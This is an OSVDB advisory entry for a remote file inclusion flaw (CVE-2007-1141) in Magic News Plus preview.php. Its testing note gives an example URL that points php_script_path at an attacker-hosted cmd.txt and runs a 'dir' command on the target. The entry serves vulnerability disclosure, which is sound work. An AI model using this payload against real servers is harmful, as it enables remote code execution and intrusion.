Magic News Plus preview.php php_script_path Variable Remote File Inclusion

2007-02-21T05:55:11
ID OSVDB:33135
Type osvdb
Reporter OSVDB
Modified 2007-02-21T05:55:11

Description

Manual Testing Notes

http://[target]/preview.php?php_script_path=http://[attacker]/tools/cmd.txt?/ss&cmd=dir

References:

Related OSVDB ID: 33136 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0410.html CVE-2007-1141 Bugtraq ID: 22661